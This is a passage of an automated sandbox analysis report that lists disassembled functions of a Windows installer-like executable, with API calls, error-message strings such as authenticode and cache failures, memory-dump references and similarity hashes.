                                                                                                                                                              • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
                                                                                                                                                              • API String ID: 2608678126-3424578679
                                                                                                                                                              • Opcode ID: f9ee1234c5b233744af9e81962f7291f8f866c5f97f24c5e2896224a576b7e66
                                                                                                                                                              • Instruction ID: 4a80d8a9c713396f5cc93733c7541c037fdd45e6bd0f6106324585f82f3eb299
                                                                                                                                                              • Opcode Fuzzy Hash: f9ee1234c5b233744af9e81962f7291f8f866c5f97f24c5e2896224a576b7e66
                                                                                                                                                              • Instruction Fuzzy Hash: D231F531900659FFCB229F95DC08EAEBBF8EF58320F108265F924E22A1C73499508B90
                                                                                                                                                              Function 0080093B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92processCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 008009AB
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 008009B5
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 008009FE
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 00800A0B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                                                              • String ID: "%ls" %ls$D$procutil.cpp
                                                                                                                                                              • API String ID: 161867955-2732225242
                                                                                                                                                              • Opcode ID: dda1d5bf582e8cd3bfccaddf77d7ef898dba4c5e37f59de3030900ff6d010ecd
                                                                                                                                                              • Instruction ID: 9e42ca1e85b7cf4a0571cde2790afb1a3f6fabc6e1a98de92b0e298061cd5df8
                                                                                                                                                              • Opcode Fuzzy Hash: dda1d5bf582e8cd3bfccaddf77d7ef898dba4c5e37f59de3030900ff6d010ecd
                                                                                                                                                              • Instruction Fuzzy Hash: 4C214F72D0125EABDB51DFD5CD45AAFBBB8FF04710F100029EA14F7251D3719E508AA1
                                                                                                                                                              Function 007C9B9A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 75COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007C9BB3
                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,007CA8AB,00000100,000002C0,000002C0,00000100), ref: 007C9BD3
                                                                                                                                                              • GetLastError.KERNEL32(?,007CA8AB,00000100,000002C0,000002C0,00000100), ref: 007C9BDE
                                                                                                                                                              Strings
                                                                                                                                                              • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 007C9C4A
                                                                                                                                                              • Failed to set directory search path variable., xrefs: 007C9C0F
                                                                                                                                                              • Failed while searching directory search: %ls, for path: %ls, xrefs: 007C9C34
                                                                                                                                                              • Failed to format variable string., xrefs: 007C9BBE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                              • String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                                              • API String ID: 1811509786-2966038646
                                                                                                                                                              • Opcode ID: ad0fe1f2a933fd0fada43e3c4f001f523ee5ac8f4bfcab6f9c0fc636086a2991
                                                                                                                                                              • Instruction ID: 0a253ded9587ef057ff0cc68ca481cfc21895bbd7cbe9e6b6850bc880ba9bff2
                                                                                                                                                              • Opcode Fuzzy Hash: ad0fe1f2a933fd0fada43e3c4f001f523ee5ac8f4bfcab6f9c0fc636086a2991
                                                                                                                                                              • Instruction Fuzzy Hash: A821FC33940525F7CB7216A89D0AF6EBB65FF10320F20011DFE10B61A1D76D5D50AAD5
                                                                                                                                                              Function 007C9D4B Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 72COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • _MREFOpen@16.MSPDB140-MSVCRT ref: 007C9D64
                                                                                                                                                              • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,007CA883,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 007C9D84
                                                                                                                                                              • GetLastError.KERNEL32(?,007CA883,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 007C9D8F
                                                                                                                                                              Strings
                                                                                                                                                              • File search: %ls, did not find path: %ls, xrefs: 007C9DF3
                                                                                                                                                              • Failed to set variable to file search path., xrefs: 007C9DE7
                                                                                                                                                              • Failed while searching file search: %ls, for path: %ls, xrefs: 007C9DBD
                                                                                                                                                              • Failed to format variable string., xrefs: 007C9D6F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                              • String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
                                                                                                                                                              • API String ID: 1811509786-3425311760
                                                                                                                                                              • Opcode ID: aa6d4f57a4d264fe2c1c5ba4ae22328e72b742ca60fe14b9f37f99aaf7466271
                                                                                                                                                              • Instruction ID: 40c14502d0d6301432e862fe558611b24c3b7ee8248a8de0c002a0b9079f8fb8
                                                                                                                                                              • Opcode Fuzzy Hash: aa6d4f57a4d264fe2c1c5ba4ae22328e72b742ca60fe14b9f37f99aaf7466271
                                                                                                                                                              • Instruction Fuzzy Hash: 5511A833A40525F7DFA26698CD0AF5EBB65EF10721F20021DFA11B62A1E72A5E10A6D1
                                                                                                                                                              Function 007C9A4D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 57COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 007C9AC4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeString
                                                                                                                                                              • String ID: Condition$ET|$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.$`<u
                                                                                                                                                              • API String ID: 3341692771-993761068
                                                                                                                                                              • Opcode ID: c364a2d373fe3d82ec90695757d9306778021e9f792f8692d765bdf1f2d19c53
                                                                                                                                                              • Instruction ID: 5a35aebcffa57bcbff94d1389bbc6a1d957dc17490e0a28f02d7553ae595dcfa
                                                                                                                                                              • Opcode Fuzzy Hash: c364a2d373fe3d82ec90695757d9306778021e9f792f8692d765bdf1f2d19c53
                                                                                                                                                              • Instruction Fuzzy Hash: E4116931941224BBDB959A94CD0AFADB768FF00721F11815DFD01FA290D7799E40D684
                                                                                                                                                              Function 007DCF25 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 55synchronizationthreadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,007DD365,00000000,?,?,007DC7C9,00000001,?,?,?,?,?), ref: 007DCF37
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007DD365,00000000,?,?,007DC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 007DCF41
                                                                                                                                                              • GetExitCodeThread.KERNEL32(00000001,?,?,?,007DD365,00000000,?,?,007DC7C9,00000001,?,?,?,?,?,00000000), ref: 007DCF7D
                                                                                                                                                              • GetLastError.KERNEL32(?,?,007DD365,00000000,?,?,007DC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 007DCF87
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                                              • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
                                                                                                                                                              • API String ID: 3686190907-1954264426
                                                                                                                                                              • Opcode ID: 6fc0f3be7ea1c6a470bac8d292ab6e3dc9198f82b70cfa36ffedab2871321e14
                                                                                                                                                              • Instruction ID: 6fb667c31042a994477891943e1c58bcbdd3f494868cb59200453c8437fc9fa2
                                                                                                                                                              • Opcode Fuzzy Hash: 6fc0f3be7ea1c6a470bac8d292ab6e3dc9198f82b70cfa36ffedab2871321e14
                                                                                                                                                              • Instruction Fuzzy Hash: 6A012673A81636A7C73257858C0AADF7AA9FF04B71B02016ABE14FB380E7588D00C1E4
                                                                                                                                                              Function 007D69AE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54synchronizationthreadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,007D6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 007D69BB
                                                                                                                                                              • GetLastError.KERNEL32(?,007D6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 007D69C5
                                                                                                                                                              • GetExitCodeThread.KERNEL32(00000001,00000000,?,007D6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 007D6A04
                                                                                                                                                              • GetLastError.KERNEL32(?,007D6EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 007D6A0E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                                              • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
                                                                                                                                                              • API String ID: 3686190907-2546940223
                                                                                                                                                              • Opcode ID: 6640e82fdfe1337833c7d19bce23c06ee72daf698495ab24f9f5036a4860ce50
                                                                                                                                                              • Instruction ID: cbd7c5bae121dd0e73ac3f38e7ca24cfcb658f9b5dbb46c03c6c0e8e883cc67f
                                                                                                                                                              • Opcode Fuzzy Hash: 6640e82fdfe1337833c7d19bce23c06ee72daf698495ab24f9f5036a4860ce50
                                                                                                                                                              • Instruction Fuzzy Hash: 8811A570740206FBDB109FA19D06B6E36BCFF00710F10816AB954E9390EB39DE409764
                                                                                                                                                              Function 007DAB9E Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 140COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(yT|,000000FF,00AAC56B,E90080BA,007C53BD,00000000,?,E90080BA,00000000), ref: 007DAC94
                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,yT|,000000FF,00AAC56B,E90080BA,007C53BD,00000000,?,E90080BA,00000000), ref: 007DACD8
                                                                                                                                                              Strings
                                                                                                                                                              • cache.cpp, xrefs: 007DAC6A, 007DACB8, 007DACFC
                                                                                                                                                              • Failed to get provider state from authenticode certificate., xrefs: 007DACC2
                                                                                                                                                              • Failed to verify expected payload against actual certificate chain., xrefs: 007DAD1E
                                                                                                                                                              • yT|, xrefs: 007DAC88
                                                                                                                                                              • Failed authenticode verification of payload: %ls, xrefs: 007DAC75
                                                                                                                                                              • Failed to get signer chain from authenticode certificate., xrefs: 007DAD06
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                              • String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp$yT|
                                                                                                                                                              • API String ID: 1452528299-1607621356
                                                                                                                                                              • Opcode ID: 3d1e70471aede2138eb965441d540d2fad1e1db3976de5f97ab932ff359b8322
                                                                                                                                                              • Instruction ID: 28170f85aeeafe7cc8661ed8cba32a57733eef202e9d40b25e999a0cf9c62c57
                                                                                                                                                              • Opcode Fuzzy Hash: 3d1e70471aede2138eb965441d540d2fad1e1db3976de5f97ab932ff359b8322
                                                                                                                                                              • Instruction Fuzzy Hash: 66418772D01229BBDB119B94CC46BDEBBB8FF04720F11012AF914FB381E77959408AE1
                                                                                                                                                              Function 007DF7D9 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 118COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 007DF7EE
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 007DF8FB
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to set source path for payload., xrefs: 007DF88A
                                                                                                                                                              • UX requested unknown container with id: %ls, xrefs: 007DF8BA
                                                                                                                                                              • Failed to set source path for container., xrefs: 007DF8E0
                                                                                                                                                              • UX denied while trying to set source on embedded payload: %ls, xrefs: 007DF870
                                                                                                                                                              • Engine is active, cannot change engine state., xrefs: 007DF808
                                                                                                                                                              • UX requested unknown payload with id: %ls, xrefs: 007DF85A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                              • String ID: Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                                              • API String ID: 3168844106-4121889706
                                                                                                                                                              • Opcode ID: bf60864f7827ea478d0d13e6146d173753d1178f51c7af8d3905ad25675fc9c9
                                                                                                                                                              • Instruction ID: 7dc4b6c8bf05426c7da31362dc8ee40b584824894a96c069a84f674ee4c9a12f
                                                                                                                                                              • Opcode Fuzzy Hash: bf60864f7827ea478d0d13e6146d173753d1178f51c7af8d3905ad25675fc9c9
                                                                                                                                                              • Instruction Fuzzy Hash: DD310432A00655ABCB219B58CC4AE9A77BCFF14720B15402BF806EB341DB7DED40A792
                                                                                                                                                              Function 007C71FD Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 99stringCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 007C7210
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to format escape sequence., xrefs: 007C72AA
                                                                                                                                                              • Failed to append escape sequence., xrefs: 007C72A3
                                                                                                                                                              • Failed to copy string., xrefs: 007C72C4
                                                                                                                                                              • Failed to append characters., xrefs: 007C729C
                                                                                                                                                              • [\%c], xrefs: 007C726F
                                                                                                                                                              • Failed to allocate buffer for escaped string., xrefs: 007C7227
                                                                                                                                                              • []{}, xrefs: 007C723A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                              • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
                                                                                                                                                              • API String ID: 1659193697-3250950999
                                                                                                                                                              • Opcode ID: c6498e17625aa4f2d22c1360696a828684f9e4849b4a866a6d56ee79080f3b92
                                                                                                                                                              • Instruction ID: 5fc2cff65f44c6ff6801ed4f94983fd6a0f02271a00598f86ae999d904ae50b6
                                                                                                                                                              • Opcode Fuzzy Hash: c6498e17625aa4f2d22c1360696a828684f9e4849b4a866a6d56ee79080f3b92
                                                                                                                                                              • Instruction Fuzzy Hash: 4F21B432909619B6DB255A948C46FAE7BB9FF10731F20011DB901F6181DEBD5E00DA91
                                                                                                                                                              Function 007E5BDC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 207COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(00000000,00000000,0080B500,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,007E67DE,?,00000001,?,0080B4A0), ref: 007E5C45
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to insert execute action., xrefs: 007E5C9A
                                                                                                                                                              • Failed grow array of ordered patches., xrefs: 007E5CDE
                                                                                                                                                              • feclient.dll, xrefs: 007E5C3B, 007E5D65
                                                                                                                                                              • Failed to plan action for target product., xrefs: 007E5CF0
                                                                                                                                                              • Failed to copy target product code., xrefs: 007E5D78
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareString
                                                                                                                                                              • String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
                                                                                                                                                              • API String ID: 1825529933-3477540455
                                                                                                                                                              • Opcode ID: 1026f39155cadbcc0ffddbd6788be764b539542e130a5374cb885b83918f5d9e
                                                                                                                                                              • Instruction ID: 80ad8ef06b2ebe01f0c1ba3ebe97da2fd14e4ac333515a31f18f358ede7371d5
                                                                                                                                                              • Opcode Fuzzy Hash: 1026f39155cadbcc0ffddbd6788be764b539542e130a5374cb885b83918f5d9e
                                                                                                                                                              • Instruction Fuzzy Hash: 818127B560178ADFCB14CF59C890AAA77A5FF08328F218569EC158B362D734EC51CFA0
                                                                                                                                                              Function 007FCAED Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,007FD262,00000000,00000000,00000000,00000000,00000000,007F2F1D), ref: 007FCB2F
                                                                                                                                                              • __fassign.LIBCMT ref: 007FCBAA
                                                                                                                                                              • __fassign.LIBCMT ref: 007FCBC5
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 007FCBEB
                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,007FD262,00000000,?,?,?,?,?,?,?,?,?,007FD262,00000000), ref: 007FCC0A
                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,007FD262,00000000,?,?,?,?,?,?,?,?,?,007FD262,00000000), ref: 007FCC43
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                              • Opcode ID: 009352effc442a397bba2e0a3bbb973f6ded9eb283e3732207532b7364599c08
                                                                                                                                                              • Instruction ID: e98160b6568b1166a46c08bc03db14df08f3a422497ac6aec7cd9372bcdf1a5d
                                                                                                                                                              • Opcode Fuzzy Hash: 009352effc442a397bba2e0a3bbb973f6ded9eb283e3732207532b7364599c08
                                                                                                                                                              • Instruction Fuzzy Hash: 8B5191B1A0024D9FDB15CFA8DA85AEEBBF4FF09310F14411AE655E7391E7349941CBA0
                                                                                                                                                              Function 007E9279 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 150COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,007D7113,000000B8,0000001C,00000100), ref: 007E92A4
                                                                                                                                                              • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,0080B4B8,000000FF,?,?,?,007D7113,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 007E932E
                                                                                                                                                              Strings
                                                                                                                                                              • detect.cpp, xrefs: 007E938E
                                                                                                                                                              • comres.dll, xrefs: 007E93B0
                                                                                                                                                              • Failed to initialize update bundle., xrefs: 007E93D1
                                                                                                                                                              • BA aborted detect forward compatible bundle., xrefs: 007E9398
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareString
                                                                                                                                                              • String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
                                                                                                                                                              • API String ID: 1825529933-439563586
                                                                                                                                                              • Opcode ID: f05e82fc4de15fb835519af0d783e2d4ba7f19cb062e80bc954b08047e3d6629
                                                                                                                                                              • Instruction ID: f08999fa824631815102019f5a41dc8db3b9f4e603df5505fffd2514563c1ef8
                                                                                                                                                              • Opcode Fuzzy Hash: f05e82fc4de15fb835519af0d783e2d4ba7f19cb062e80bc954b08047e3d6629
                                                                                                                                                              • Instruction Fuzzy Hash: 3351C272601241FFDF159F66CC85EAAB76AFF09310F104269FA249A2A1C775EC60DB90
                                                                                                                                                              Function 008002F8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 123COMMON
